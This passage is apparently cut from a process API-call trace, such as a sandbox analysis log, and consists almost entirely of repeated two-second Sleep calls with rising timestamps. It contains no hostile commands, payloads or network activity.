(dwMilliseconds=0x7d0) [0283.301] Sleep (dwMilliseconds=0x7d0) [0283.310] Sleep (dwMilliseconds=0x7d0) [0283.312] Sleep (dwMilliseconds=0x7d0) [0283.320] Sleep (dwMilliseconds=0x7d0) [0283.321] Sleep (dwMilliseconds=0x7d0) [0283.329] Sleep (dwMilliseconds=0x7d0) [0283.346] Sleep (dwMilliseconds=0x7d0) [0283.349] Sleep (dwMilliseconds=0x7d0) [0283.351] Sleep (dwMilliseconds=0x7d0) [0283.360] Sleep (dwMilliseconds=0x7d0) [0283.368] Sleep (dwMilliseconds=0x7d0) [0283.370] Sleep (dwMilliseconds=0x7d0) [0283.378] Sleep (dwMilliseconds=0x7d0) [0283.387] Sleep (dwMilliseconds=0x7d0) [0283.389] Sleep (dwMilliseconds=0x7d0) [0283.391] Sleep (dwMilliseconds=0x7d0) [0283.398] Sleep (dwMilliseconds=0x7d0) [0283.406] Sleep (dwMilliseconds=0x7d0) [0283.408] Sleep (dwMilliseconds=0x7d0) [0283.416] Sleep (dwMilliseconds=0x7d0) [0283.417] Sleep (dwMilliseconds=0x7d0) [0283.425] Sleep (dwMilliseconds=0x7d0) [0283.427] Sleep (dwMilliseconds=0x7d0) [0283.434] Sleep (dwMilliseconds=0x7d0) [0283.436] Sleep (dwMilliseconds=0x7d0) [0283.444] Sleep (dwMilliseconds=0x7d0) [0283.454] Sleep (dwMilliseconds=0x7d0) [0283.462] Sleep (dwMilliseconds=0x7d0) [0283.469] Sleep (dwMilliseconds=0x7d0) [0283.471] Sleep (dwMilliseconds=0x7d0) [0283.477] Sleep (dwMilliseconds=0x7d0) [0283.478] Sleep (dwMilliseconds=0x7d0) [0283.485] Sleep (dwMilliseconds=0x7d0) [0283.492] Sleep (dwMilliseconds=0x7d0) [0283.500] Sleep (dwMilliseconds=0x7d0) [0283.507] Sleep (dwMilliseconds=0x7d0) [0283.508] Sleep (dwMilliseconds=0x7d0) [0283.514] Sleep (dwMilliseconds=0x7d0) [0283.515] Sleep (dwMilliseconds=0x7d0) [0283.521] Sleep (dwMilliseconds=0x7d0) [0283.522] Sleep (dwMilliseconds=0x7d0) [0283.528] Sleep (dwMilliseconds=0x7d0) [0283.529] Sleep (dwMilliseconds=0x7d0) [0283.535] Sleep (dwMilliseconds=0x7d0) [0283.536] Sleep (dwMilliseconds=0x7d0) [0283.543] Sleep (dwMilliseconds=0x7d0) [0283.544] Sleep (dwMilliseconds=0x7d0) [0283.550] Sleep (dwMilliseconds=0x7d0) [0283.551] Sleep (dwMilliseconds=0x7d0) [0283.557] Sleep (dwMilliseconds=0x7d0) [0283.559] Sleep (dwMilliseconds=0x7d0) [0283.566] Sleep (dwMilliseconds=0x7d0) [0283.567] Sleep (dwMilliseconds=0x7d0) [0283.569] Sleep (dwMilliseconds=0x7d0) [0283.573] Sleep (dwMilliseconds=0x7d0) [0283.574] Sleep (dwMilliseconds=0x7d0) [0283.581] Sleep (dwMilliseconds=0x7d0) [0283.583] Sleep (dwMilliseconds=0x7d0) [0283.589] Sleep (dwMilliseconds=0x7d0) [0283.590] Sleep (dwMilliseconds=0x7d0) [0283.595] Sleep (dwMilliseconds=0x7d0) [0283.598] Sleep (dwMilliseconds=0x7d0) [0283.604] Sleep (dwMilliseconds=0x7d0) [0283.605] Sleep (dwMilliseconds=0x7d0) [0283.611] Sleep (dwMilliseconds=0x7d0) [0283.615] Sleep (dwMilliseconds=0x7d0) [0283.618] Sleep (dwMilliseconds=0x7d0) [0283.619] Sleep (dwMilliseconds=0x7d0) [0283.625] Sleep (dwMilliseconds=0x7d0) [0283.626] Sleep (dwMilliseconds=0x7d0) [0283.632] Sleep (dwMilliseconds=0x7d0) [0283.633] Sleep (dwMilliseconds=0x7d0) [0283.640] Sleep (dwMilliseconds=0x7d0) [0283.648] Sleep (dwMilliseconds=0x7d0) [0283.649] Sleep (dwMilliseconds=0x7d0) [0283.655] Sleep (dwMilliseconds=0x7d0) [0283.659] Sleep (dwMilliseconds=0x7d0) [0283.662] Sleep (dwMilliseconds=0x7d0) [0283.669] Sleep (dwMilliseconds=0x7d0) [0283.670] Sleep (dwMilliseconds=0x7d0) [0283.676] Sleep (dwMilliseconds=0x7d0) [0283.683] Sleep (dwMilliseconds=0x7d0) [0283.685] Sleep (dwMilliseconds=0x7d0) [0283.691] Sleep (dwMilliseconds=0x7d0) [0283.692] Sleep (dwMilliseconds=0x7d0) [0283.699] Sleep (dwMilliseconds=0x7d0) [0283.701] Sleep (dwMilliseconds=0x7d0) [0283.705] Sleep (dwMilliseconds=0x7d0) [0283.707] Sleep (dwMilliseconds=0x7d0) [0283.715] Sleep (dwMilliseconds=0x7d0) [0283.717] Sleep (dwMilliseconds=0x7d0) [0283.723] Sleep (dwMilliseconds=0x7d0) [0283.724] Sleep (dwMilliseconds=0x7d0) [0283.730] Sleep (dwMilliseconds=0x7d0) [0283.732] Sleep (dwMilliseconds=0x7d0) [0283.738] Sleep (dwMilliseconds=0x7d0) [0283.739] Sleep (dwMilliseconds=0x7d0) [0283.745] Sleep (dwMilliseconds=0x7d0) [0283.749] Sleep (dwMilliseconds=0x7d0) [0283.752] Sleep (dwMilliseconds=0x7d0) [0283.753] Sleep (dwMilliseconds=0x7d0) [0283.759] Sleep (dwMilliseconds=0x7d0) [0283.760] Sleep (dwMilliseconds=0x7d0) [0283.766] Sleep (dwMilliseconds=0x7d0) [0283.768] Sleep (dwMilliseconds=0x7d0) [0283.776] Sleep (dwMilliseconds=0x7d0) [0283.783] Sleep (dwMilliseconds=0x7d0) [0283.785] Sleep (dwMilliseconds=0x7d0) [0283.790] Sleep (dwMilliseconds=0x7d0) [0283.792] Sleep (dwMilliseconds=0x7d0) [0283.795] Sleep (dwMilliseconds=0x7d0) [0283.798] Sleep (dwMilliseconds=0x7d0) [0283.805] Sleep (dwMilliseconds=0x7d0) [0283.807] Sleep (dwMilliseconds=0x7d0) [0283.812] Sleep (dwMilliseconds=0x7d0) [0283.814] Sleep (dwMilliseconds=0x7d0) [0283.819] Sleep (dwMilliseconds=0x7d0) [0283.821] Sleep (dwMilliseconds=0x7d0) [0283.834] Sleep (dwMilliseconds=0x7d0) [0283.836] Sleep (dwMilliseconds=0x7d0) [0283.837] Sleep (dwMilliseconds=0x7d0) [0283.842] Sleep (dwMilliseconds=0x7d0) [0283.843] Sleep (dwMilliseconds=0x7d0) [0283.849] Sleep (dwMilliseconds=0x7d0) [0283.851] Sleep (dwMilliseconds=0x7d0) [0283.856] Sleep (dwMilliseconds=0x7d0) [0283.858] Sleep (dwMilliseconds=0x7d0) [0283.864] Sleep (dwMilliseconds=0x7d0) [0283.870] Sleep (dwMilliseconds=0x7d0) [0283.871] Sleep (dwMilliseconds=0x7d0) [0283.877] Sleep (dwMilliseconds=0x7d0) [0283.878] Sleep (dwMilliseconds=0x7d0) [0283.881] Sleep (dwMilliseconds=0x7d0) [0283.884] Sleep (dwMilliseconds=0x7d0) [0283.885] Sleep (dwMilliseconds=0x7d0) [0283.893] Sleep (dwMilliseconds=0x7d0) [0283.899] Sleep (dwMilliseconds=0x7d0) [0283.906] Sleep (dwMilliseconds=0x7d0) [0283.907] Sleep (dwMilliseconds=0x7d0) [0283.913] Sleep (dwMilliseconds=0x7d0) [0283.915] Sleep (dwMilliseconds=0x7d0) [0283.920] Sleep (dwMilliseconds=0x7d0) [0283.922] Sleep (dwMilliseconds=0x7d0) [0283.926] Sleep (dwMilliseconds=0x7d0) [0283.930] Sleep (dwMilliseconds=0x7d0) [0283.931] Sleep (dwMilliseconds=0x7d0) [0283.937] Sleep (dwMilliseconds=0x7d0) [0283.939] Sleep (dwMilliseconds=0x7d0) [0283.945] Sleep (dwMilliseconds=0x7d0) [0283.953] Sleep (dwMilliseconds=0x7d0) [0283.955] Sleep (dwMilliseconds=0x7d0) [0283.961] Sleep (dwMilliseconds=0x7d0) [0283.963] Sleep (dwMilliseconds=0x7d0) [0283.968] Sleep (dwMilliseconds=0x7d0) [0283.971] Sleep (dwMilliseconds=0x7d0) [0283.974] Sleep (dwMilliseconds=0x7d0) [0283.990] Sleep (dwMilliseconds=0x7d0) [0283.991] Sleep (dwMilliseconds=0x7d0) [0284.000] Sleep (dwMilliseconds=0x7d0) [0284.002] Sleep (dwMilliseconds=0x7d0) [0284.009] Sleep (dwMilliseconds=0x7d0) [0284.011] Sleep (dwMilliseconds=0x7d0) [0284.016] Sleep (dwMilliseconds=0x7d0) [0284.019] Sleep (dwMilliseconds=0x7d0) [0284.020] Sleep (dwMilliseconds=0x7d0) [0284.028] Sleep (dwMilliseconds=0x7d0) [0284.029] Sleep (dwMilliseconds=0x7d0) [0284.036] Sleep (dwMilliseconds=0x7d0) [0284.048] Sleep (dwMilliseconds=0x7d0) [0284.049] Sleep (dwMilliseconds=0x7d0) [0284.055] Sleep (dwMilliseconds=0x7d0) [0284.057] Sleep (dwMilliseconds=0x7d0) [0284.059] Sleep (dwMilliseconds=0x7d0) [0284.063] Sleep (dwMilliseconds=0x7d0) [0284.065] Sleep (dwMilliseconds=0x7d0) [0284.075] Sleep (dwMilliseconds=0x7d0) [0284.084] Sleep (dwMilliseconds=0x7d0) [0284.086] Sleep (dwMilliseconds=0x7d0) [0284.095] Sleep (dwMilliseconds=0x7d0) [0284.097] Sleep (dwMilliseconds=0x7d0) [0284.104] Sleep (dwMilliseconds=0x7d0) [0284.108] Sleep (dwMilliseconds=0x7d0) [0284.114] Sleep (dwMilliseconds=0x7d0) [0284.122] Sleep (dwMilliseconds=0x7d0) [0284.131] Sleep (dwMilliseconds=0x7d0) [0284.144] Sleep (dwMilliseconds=0x7d0) [0284.151] Sleep (dwMilliseconds=0x7d0) [0284.153] Sleep (dwMilliseconds=0x7d0) [0284.159] Sleep (dwMilliseconds=0x7d0) [0284.161] Sleep (dwMilliseconds=0x7d0) [0284.168] Sleep (dwMilliseconds=0x7d0) [0284.170] Sleep (dwMilliseconds=0x7d0) [0284.178] Sleep (dwMilliseconds=0x7d0) [0284.179] Sleep (dwMilliseconds=0x7d0) [0284.187] Sleep (dwMilliseconds=0x7d0) [0284.189] Sleep (dwMilliseconds=0x7d0) [0284.197] Sleep (dwMilliseconds=0x7d0) [0284.198] Sleep (dwMilliseconds=0x7d0) [0284.208] Sleep (dwMilliseconds=0x7d0) [0284.209] Sleep (dwMilliseconds=0x7d0) [0284.217] Sleep (dwMilliseconds=0x7d0) [0284.223] Sleep (dwMilliseconds=0x7d0) [0284.224] Sleep (dwMilliseconds=0x7d0) [0284.230] Sleep (dwMilliseconds=0x7d0) [0284.232] Sleep (dwMilliseconds=0x7d0) [0284.239] Sleep (dwMilliseconds=0x7d0) [0284.244] Sleep (dwMilliseconds=0x7d0) [0284.258] Sleep (dwMilliseconds=0x7d0) [0284.264] Sleep (dwMilliseconds=0x7d0) [0284.266] Sleep (dwMilliseconds=0x7d0) [0284.271] Sleep (dwMilliseconds=0x7d0) [0284.273] Sleep (dwMilliseconds=0x7d0) [0284.314] Sleep (dwMilliseconds=0x7d0) [0284.323] Sleep (dwMilliseconds=0x7d0) [0284.325] Sleep (dwMilliseconds=0x7d0) [0284.341] Sleep (dwMilliseconds=0x7d0) [0284.345] Sleep (dwMilliseconds=0x7d0) [0284.348] Sleep (dwMilliseconds=0x7d0) [0284.355] Sleep (dwMilliseconds=0x7d0) [0284.357] Sleep (dwMilliseconds=0x7d0) [0284.362] Sleep (dwMilliseconds=0x7d0) [0284.364] Sleep (dwMilliseconds=0x7d0) [0284.369] Sleep (dwMilliseconds=0x7d0) [0284.377] Sleep (dwMilliseconds=0x7d0) [0284.385] Sleep (dwMilliseconds=0x7d0) [0284.388] Sleep (dwMilliseconds=0x7d0) [0284.393] Sleep (dwMilliseconds=0x7d0) [0284.401] Sleep (dwMilliseconds=0x7d0) [0284.402] Sleep (dwMilliseconds=0x7d0) [0284.409] Sleep (dwMilliseconds=0x7d0) [0284.415] Sleep (dwMilliseconds=0x7d0) [0284.416] Sleep (dwMilliseconds=0x7d0) [0284.422] Sleep (dwMilliseconds=0x7d0) [0284.423] Sleep (dwMilliseconds=0x7d0) [0284.428] Sleep (dwMilliseconds=0x7d0) [0284.430] Sleep (dwMilliseconds=0x7d0) [0284.434] Sleep (dwMilliseconds=0x7d0) [0284.436] Sleep (dwMilliseconds=0x7d0) [0284.438] Sleep (dwMilliseconds=0x7d0) [0284.443] Sleep (dwMilliseconds=0x7d0) [0284.445] Sleep (dwMilliseconds=0x7d0) [0284.453] Sleep (dwMilliseconds=0x7d0) [0284.455] Sleep (dwMilliseconds=0x7d0) [0284.460] Sleep (dwMilliseconds=0x7d0) [0284.461] Sleep (dwMilliseconds=0x7d0) [0284.467] Sleep (dwMilliseconds=0x7d0) [0284.469] Sleep (dwMilliseconds=0x7d0) [0284.475] Sleep (dwMilliseconds=0x7d0) [0284.476] Sleep (dwMilliseconds=0x7d0) [0284.480] Sleep (dwMilliseconds=0x7d0) [0284.483] Sleep (dwMilliseconds=0x7d0) [0284.489] Sleep (dwMilliseconds=0x7d0) [0284.491] Sleep (dwMilliseconds=0x7d0) [0284.498] Sleep (dwMilliseconds=0x7d0) [0284.500] Sleep (dwMilliseconds=0x7d0) [0284.505] Sleep (dwMilliseconds=0x7d0) [0284.515] Sleep (dwMilliseconds=0x7d0) [0284.516] Sleep (dwMilliseconds=0x7d0) [0284.523] Sleep (dwMilliseconds=0x7d0) [0284.524] Sleep (dwMilliseconds=0x7d0) [0284.526] Sleep (dwMilliseconds=0x7d0) [0284.531] Sleep (dwMilliseconds=0x7d0) [0284.533] Sleep (dwMilliseconds=0x7d0) [0284.539] Sleep (dwMilliseconds=0x7d0) [0284.546] Sleep (dwMilliseconds=0x7d0) [0284.547] Sleep (dwMilliseconds=0x7d0) [0284.553] Sleep (dwMilliseconds=0x7d0) [0284.554] Sleep (dwMilliseconds=0x7d0) [0284.559] Sleep (dwMilliseconds=0x7d0) [0284.566] Sleep (dwMilliseconds=0x7d0) [0284.567] Sleep (dwMilliseconds=0x7d0) [0284.570] Sleep (dwMilliseconds=0x7d0) [0284.574] Sleep (dwMilliseconds=0x7d0) [0284.575] Sleep (dwMilliseconds=0x7d0) [0284.581] Sleep (dwMilliseconds=0x7d0) [0284.582] Sleep (dwMilliseconds=0x7d0) [0284.588] Sleep (dwMilliseconds=0x7d0) [0284.589] Sleep (dwMilliseconds=0x7d0) [0284.596] Sleep (dwMilliseconds=0x7d0) [0284.603] Sleep (dwMilliseconds=0x7d0) [0284.605] Sleep (dwMilliseconds=0x7d0) [0284.613] Sleep (dwMilliseconds=0x7d0) [0284.616] Sleep (dwMilliseconds=0x7d0) [0284.622] Sleep (dwMilliseconds=0x7d0) [0284.623] Sleep (dwMilliseconds=0x7d0) [0284.632] Sleep (dwMilliseconds=0x7d0) [0284.634] Sleep (dwMilliseconds=0x7d0) [0284.640] Sleep (dwMilliseconds=0x7d0) [0284.641] Sleep (dwMilliseconds=0x7d0) [0284.648] Sleep (dwMilliseconds=0x7d0) [0284.649] Sleep (dwMilliseconds=0x7d0) [0284.655] Sleep (dwMilliseconds=0x7d0) [0284.660] Sleep (dwMilliseconds=0x7d0) [0284.759] Sleep (dwMilliseconds=0x7d0) [0284.774] Sleep (dwMilliseconds=0x7d0) [0284.783] Sleep (dwMilliseconds=0x7d0) [0284.784] Sleep (dwMilliseconds=0x7d0) [0284.794] Sleep (dwMilliseconds=0x7d0) [0284.796] Sleep (dwMilliseconds=0x7d0) [0284.802] Sleep (dwMilliseconds=0x7d0) [0284.803] Sleep (dwMilliseconds=0x7d0) [0284.806] Sleep (dwMilliseconds=0x7d0) [0284.809] Sleep (dwMilliseconds=0x7d0) [0284.811] Sleep (dwMilliseconds=0x7d0) [0284.818] Sleep (dwMilliseconds=0x7d0) [0284.825] Sleep (dwMilliseconds=0x7d0) [0284.833] Sleep (dwMilliseconds=0x7d0) [0284.834] Sleep (dwMilliseconds=0x7d0) [0284.842] Sleep (dwMilliseconds=0x7d0) [0284.850] Sleep (dwMilliseconds=0x7d0) [0284.851] Sleep (dwMilliseconds=0x7d0) [0284.859] Sleep (dwMilliseconds=0x7d0) [0284.866] Sleep (dwMilliseconds=0x7d0) [0284.867] Sleep (dwMilliseconds=0x7d0) [0284.875] Sleep (dwMilliseconds=0x7d0) [0284.882] Sleep (dwMilliseconds=0x7d0) [0284.883] Sleep (dwMilliseconds=0x7d0) [0284.889] Sleep (dwMilliseconds=0x7d0) [0284.890] Sleep (dwMilliseconds=0x7d0) [0284.894] Sleep (dwMilliseconds=0x7d0) [0284.898] Sleep (dwMilliseconds=0x7d0) [0284.910] Sleep (dwMilliseconds=0x7d0) [0284.917] Sleep (dwMilliseconds=0x7d0) [0284.919] Sleep (dwMilliseconds=0x7d0) [0284.926] Sleep (dwMilliseconds=0x7d0) [0284.927] Sleep (dwMilliseconds=0x7d0) [0284.933] Sleep (dwMilliseconds=0x7d0) [0284.935] Sleep (dwMilliseconds=0x7d0) [0284.943] Sleep (dwMilliseconds=0x7d0) [0284.946] Sleep (dwMilliseconds=0x7d0) [0284.951] Sleep (dwMilliseconds=0x7d0) [0284.952] Sleep (dwMilliseconds=0x7d0) [0284.960] Sleep (dwMilliseconds=0x7d0) [0284.967] Sleep (dwMilliseconds=0x7d0) [0284.968] Sleep (dwMilliseconds=0x7d0) [0284.975] Sleep (dwMilliseconds=0x7d0) [0284.982] Sleep (dwMilliseconds=0x7d0) [0284.984] Sleep (dwMilliseconds=0x7d0) [0284.989] Sleep (dwMilliseconds=0x7d0) [0284.991] Sleep (dwMilliseconds=0x7d0) [0285.000] Sleep (dwMilliseconds=0x7d0) [0285.001] Sleep (dwMilliseconds=0x7d0) [0285.010] Sleep (dwMilliseconds=0x7d0) [0285.013] Sleep (dwMilliseconds=0x7d0) [0285.022] Sleep (dwMilliseconds=0x7d0) [0285.031] Sleep (dwMilliseconds=0x7d0) [0285.033] Sleep (dwMilliseconds=0x7d0) [0285.037] Sleep (dwMilliseconds=0x7d0) [0285.042] Sleep (dwMilliseconds=0x7d0) [0285.051] Sleep (dwMilliseconds=0x7d0) [0285.060] Sleep (dwMilliseconds=0x7d0) [0285.067] Sleep (dwMilliseconds=0x7d0) [0285.068] Sleep (dwMilliseconds=0x7d0) [0285.074] Sleep (dwMilliseconds=0x7d0) [0285.079] Sleep (dwMilliseconds=0x7d0) [0285.081] Sleep (dwMilliseconds=0x7d0) [0285.083] Sleep (dwMilliseconds=0x7d0) [0285.089] Sleep (dwMilliseconds=0x7d0) [0285.090] Sleep (dwMilliseconds=0x7d0) [0285.096] Sleep (dwMilliseconds=0x7d0) [0285.102] Sleep (dwMilliseconds=0x7d0) [0285.104] Sleep (dwMilliseconds=0x7d0) [0285.109] Sleep (dwMilliseconds=0x7d0) [0285.111] Sleep (dwMilliseconds=0x7d0) [0285.118] Sleep (dwMilliseconds=0x7d0) [0285.123] Sleep (dwMilliseconds=0x7d0) [0285.126] Sleep (dwMilliseconds=0x7d0) [0285.133] Sleep (dwMilliseconds=0x7d0) [0285.134] Sleep (dwMilliseconds=0x7d0) [0285.140] Sleep (dwMilliseconds=0x7d0) [0285.148] Sleep (dwMilliseconds=0x7d0) [0285.150] Sleep (dwMilliseconds=0x7d0) [0285.160] Sleep (dwMilliseconds=0x7d0) [0285.167] Sleep (dwMilliseconds=0x7d0) [0285.169] Sleep (dwMilliseconds=0x7d0) [0285.215] Sleep (dwMilliseconds=0x7d0) [0285.217] Sleep (dwMilliseconds=0x7d0) [0285.244] Sleep (dwMilliseconds=0x7d0) [0285.281] Sleep (dwMilliseconds=0x7d0) [0285.318] Sleep (dwMilliseconds=0x7d0) [0285.423] Sleep (dwMilliseconds=0x7d0) [0285.457] Sleep (dwMilliseconds=0x7d0) [0285.464] Sleep (dwMilliseconds=0x7d0) [0285.769] Sleep (dwMilliseconds=0x7d0) [0287.575] Sleep (dwMilliseconds=0x7d0) [0287.618] Sleep (dwMilliseconds=0x7d0) [0288.282] Sleep (dwMilliseconds=0x7d0) [0288.288] Sleep (dwMilliseconds=0x7d0) [0288.714] Sleep (dwMilliseconds=0x7d0) [0291.544] Sleep (dwMilliseconds=0x7d0) [0292.642] Sleep (dwMilliseconds=0x7d0) [0293.790] Sleep (dwMilliseconds=0x7d0) [0293.895] Sleep (dwMilliseconds=0x7d0) [0293.933] Sleep (dwMilliseconds=0x7d0) [0293.945] Sleep (dwMilliseconds=0x7d0) [0293.960] Sleep (dwMilliseconds=0x7d0) [0293.968] Sleep (dwMilliseconds=0x7d0) [0293.983] Sleep (dwMilliseconds=0x7d0) [0293.984] Sleep (dwMilliseconds=0x7d0) [0293.987] Sleep (dwMilliseconds=0x7d0) [0293.995] Sleep (dwMilliseconds=0x7d0) [0294.003] Sleep (dwMilliseconds=0x7d0) [0294.006] Sleep (dwMilliseconds=0x7d0) [0294.016] Sleep (dwMilliseconds=0x7d0) [0294.055] Sleep (dwMilliseconds=0x7d0) [0294.088] Sleep (dwMilliseconds=0x7d0) [0294.096] Sleep (dwMilliseconds=0x7d0) [0294.501] Sleep (dwMilliseconds=0x7d0) [0294.726] Sleep (dwMilliseconds=0x7d0) [0295.468] Sleep (dwMilliseconds=0x7d0) [0295.772] Sleep (dwMilliseconds=0x7d0) [0295.850] Sleep (dwMilliseconds=0x7d0) [0295.873] Sleep (dwMilliseconds=0x7d0) [0295.886] Sleep (dwMilliseconds=0x7d0) [0295.920] Sleep (dwMilliseconds=0x7d0) [0295.922] Sleep (dwMilliseconds=0x7d0) [0295.961] Sleep (dwMilliseconds=0x7d0) [0296.000] Sleep (dwMilliseconds=0x7d0) [0296.009] Sleep (dwMilliseconds=0x7d0) [0296.059] Sleep (dwMilliseconds=0x7d0) [0296.408] Sleep (dwMilliseconds=0x7d0) [0297.064] Sleep (dwMilliseconds=0x7d0) [0297.310] Sleep (dwMilliseconds=0x7d0) [0297.477] Sleep (dwMilliseconds=0x7d0) [0297.560] Sleep (dwMilliseconds=0x7d0) [0297.582] Sleep (dwMilliseconds=0x7d0) [0297.604] Sleep (dwMilliseconds=0x7d0) [0297.613] Sleep (dwMilliseconds=0x7d0) [0297.664] Sleep (dwMilliseconds=0x7d0) [0297.744] Sleep (dwMilliseconds=0x7d0) [0297.819] Sleep (dwMilliseconds=0x7d0) [0297.906] Sleep (dwMilliseconds=0x7d0) [0298.001] Sleep (dwMilliseconds=0x7d0) [0298.258] Sleep (dwMilliseconds=0x7d0) [0298.513] Sleep (dwMilliseconds=0x7d0) [0298.696] Sleep (dwMilliseconds=0x7d0) [0298.725] Sleep (dwMilliseconds=0x7d0) [0298.854] Sleep (dwMilliseconds=0x7d0) [0298.941] Sleep (dwMilliseconds=0x7d0) [0299.025] Sleep (dwMilliseconds=0x7d0) [0299.087] Sleep (dwMilliseconds=0x7d0) [0299.133] Sleep (dwMilliseconds=0x7d0) [0299.207] Sleep (dwMilliseconds=0x7d0) [0299.262] Sleep (dwMilliseconds=0x7d0) [0299.309] Sleep (dwMilliseconds=0x7d0) [0299.354] Sleep (dwMilliseconds=0x7d0) [0299.385] Sleep (dwMilliseconds=0x7d0) [0299.466] Sleep (dwMilliseconds=0x7d0) [0299.492] Sleep (dwMilliseconds=0x7d0) [0299.495] Sleep (dwMilliseconds=0x7d0) [0299.540] Sleep (dwMilliseconds=0x7d0) [0299.602] Sleep (dwMilliseconds=0x7d0) [0299.646] Sleep (dwMilliseconds=0x7d0) [0299.664] Sleep (dwMilliseconds=0x7d0) [0299.699] Sleep (dwMilliseconds=0x7d0) [0299.705] Sleep (dwMilliseconds=0x7d0) [0299.727] Sleep (dwMilliseconds=0x7d0) [0299.729] Sleep (dwMilliseconds=0x7d0) [0299.734] Sleep (dwMilliseconds=0x7d0) [0299.738] Sleep (dwMilliseconds=0x7d0) [0299.747] Sleep (dwMilliseconds=0x7d0) [0299.751] Sleep (dwMilliseconds=0x7d0) [0299.752] Sleep (dwMilliseconds=0x7d0) [0299.754] Sleep (dwMilliseconds=0x7d0) [0299.778] Sleep (dwMilliseconds=0x7d0) [0299.781] Sleep (dwMilliseconds=0x7d0) [0299.785] Sleep (dwMilliseconds=0x7d0) [0299.827] Sleep (dwMilliseconds=0x7d0) [0299.866] Sleep (dwMilliseconds=0x7d0) [0300.218] Sleep (dwMilliseconds=0x7d0) [0300.963] Sleep (dwMilliseconds=0x7d0) [0301.272] Sleep (dwMilliseconds=0x7d0) [0301.846] Sleep (dwMilliseconds=0x7d0) [0301.901] Sleep (dwMilliseconds=0x7d0) [0301.925] Sleep (dwMilliseconds=0x7d0) [0301.957] Sleep (dwMilliseconds=0x7d0) [0301.990] Sleep (dwMilliseconds=0x7d0) [0302.018] Sleep (dwMilliseconds=0x7d0) [0302.028] Sleep (dwMilliseconds=0x7d0) [0302.079] Sleep (dwMilliseconds=0x7d0) [0302.095] Sleep (dwMilliseconds=0x7d0) [0302.236] Sleep (dwMilliseconds=0x7d0) [0302.277] Sleep (dwMilliseconds=0x7d0) [0302.315] Sleep (dwMilliseconds=0x7d0) [0302.361] Sleep (dwMilliseconds=0x7d0) [0302.786] Sleep (dwMilliseconds=0x7d0) [0302.813] Sleep (dwMilliseconds=0x7d0) [0302.816] Sleep (dwMilliseconds=0x7d0) [0302.817] Sleep (dwMilliseconds=0x7d0) [0302.819] Sleep (dwMilliseconds=0x7d0) [0302.822] Sleep (dwMilliseconds=0x7d0) [0302.825] Sleep (dwMilliseconds=0x7d0) [0302.827] Sleep (dwMilliseconds=0x7d0) [0302.917] Sleep (dwMilliseconds=0x7d0) [0302.938] Sleep (dwMilliseconds=0x7d0) [0302.941] Sleep (dwMilliseconds=0x7d0) [0302.942] Sleep (dwMilliseconds=0x7d0) [0302.952] Sleep (dwMilliseconds=0x7d0) [0303.025] Sleep (dwMilliseconds=0x7d0) [0303.064] Sleep (dwMilliseconds=0x7d0) [0303.067] Sleep (dwMilliseconds=0x7d0) [0303.088] Sleep (dwMilliseconds=0x7d0) [0303.090] Sleep (dwMilliseconds=0x7d0) [0303.106] Sleep (dwMilliseconds=0x7d0) [0303.115] Sleep (dwMilliseconds=0x7d0) [0303.126] Sleep (dwMilliseconds=0x7d0) [0303.128] Sleep (dwMilliseconds=0x7d0) [0303.152] Sleep (dwMilliseconds=0x7d0) [0303.196] Sleep (dwMilliseconds=0x7d0) [0303.223] Sleep (dwMilliseconds=0x7d0) [0303.226] Sleep (dwMilliseconds=0x7d0) [0303.241] Sleep (dwMilliseconds=0x7d0) [0303.251] Sleep (dwMilliseconds=0x7d0) [0303.258] Sleep (dwMilliseconds=0x7d0) [0303.274] Sleep (dwMilliseconds=0x7d0) [0303.319] Sleep (dwMilliseconds=0x7d0) [0303.325] Sleep (dwMilliseconds=0x7d0) [0303.338] Sleep (dwMilliseconds=0x7d0) [0303.351] Sleep (dwMilliseconds=0x7d0) [0303.375] Sleep (dwMilliseconds=0x7d0) [0303.392] Sleep (dwMilliseconds=0x7d0) [0303.394] Sleep (dwMilliseconds=0x7d0) [0303.408] Sleep (dwMilliseconds=0x7d0) [0303.430] Sleep (dwMilliseconds=0x7d0) [0303.442] Sleep (dwMilliseconds=0x7d0) [0303.472] Sleep (dwMilliseconds=0x7d0) [0303.544] Sleep (dwMilliseconds=0x7d0) [0303.569] Sleep (dwMilliseconds=0x7d0) [0303.586] Sleep (dwMilliseconds=0x7d0) [0303.594] Sleep (dwMilliseconds=0x7d0) [0303.611] Sleep (dwMilliseconds=0x7d0) [0303.623] Sleep (dwMilliseconds=0x7d0) [0303.634] Sleep (dwMilliseconds=0x7d0) [0303.643] Sleep (dwMilliseconds=0x7d0) [0303.677] Sleep (dwMilliseconds=0x7d0) [0303.690] Sleep (dwMilliseconds=0x7d0) [0303.695] Sleep (dwMilliseconds=0x7d0) [0303.702] Sleep (dwMilliseconds=0x7d0) [0303.713] Sleep (dwMilliseconds=0x7d0) [0303.749] Sleep (dwMilliseconds=0x7d0) [0303.789] Sleep (dwMilliseconds=0x7d0) [0303.807] Sleep (dwMilliseconds=0x7d0) [0303.813] Sleep (dwMilliseconds=0x7d0) [0303.830] Sleep (dwMilliseconds=0x7d0) [0303.978] Sleep (dwMilliseconds=0x7d0) [0304.038] Sleep (dwMilliseconds=0x7d0) [0304.055] Sleep (dwMilliseconds=0x7d0) [0304.128] Sleep (dwMilliseconds=0x7d0) [0304.178] Sleep (dwMilliseconds=0x7d0) [0304.253] Sleep (dwMilliseconds=0x7d0) [0304.258] Sleep (dwMilliseconds=0x7d0) [0304.275] Sleep (dwMilliseconds=0x7d0) [0304.288] Sleep (dwMilliseconds=0x7d0) [0304.295] Sleep (dwMilliseconds=0x7d0) [0304.322] Sleep (dwMilliseconds=0x7d0) [0304.335] Sleep (dwMilliseconds=0x7d0) [0304.347] Sleep (dwMilliseconds=0x7d0) [0304.354] Sleep (dwMilliseconds=0x7d0) [0304.358] Sleep (dwMilliseconds=0x7d0) [0304.359] Sleep (dwMilliseconds=0x7d0) [0304.370] Sleep (dwMilliseconds=0x7d0) [0304.372] Sleep (dwMilliseconds=0x7d0) [0304.388] Sleep (dwMilliseconds=0x7d0) [0304.399] Sleep (dwMilliseconds=0x7d0) [0304.403] Sleep (dwMilliseconds=0x7d0) [0304.404] Sleep (dwMilliseconds=0x7d0) [0304.416] Sleep (dwMilliseconds=0x7d0) [0304.418] Sleep (dwMilliseconds=0x7d0) [0304.429] Sleep (dwMilliseconds=0x7d0) [0304.430] Sleep (dwMilliseconds=0x7d0) [0304.440] Sleep (dwMilliseconds=0x7d0) [0304.443] Sleep (dwMilliseconds=0x7d0) [0304.574] Sleep (dwMilliseconds=0x7d0) [0304.576] Sleep (dwMilliseconds=0x7d0) [0304.589] Sleep (dwMilliseconds=0x7d0) [0304.591] Sleep (dwMilliseconds=0x7d0) [0304.720] 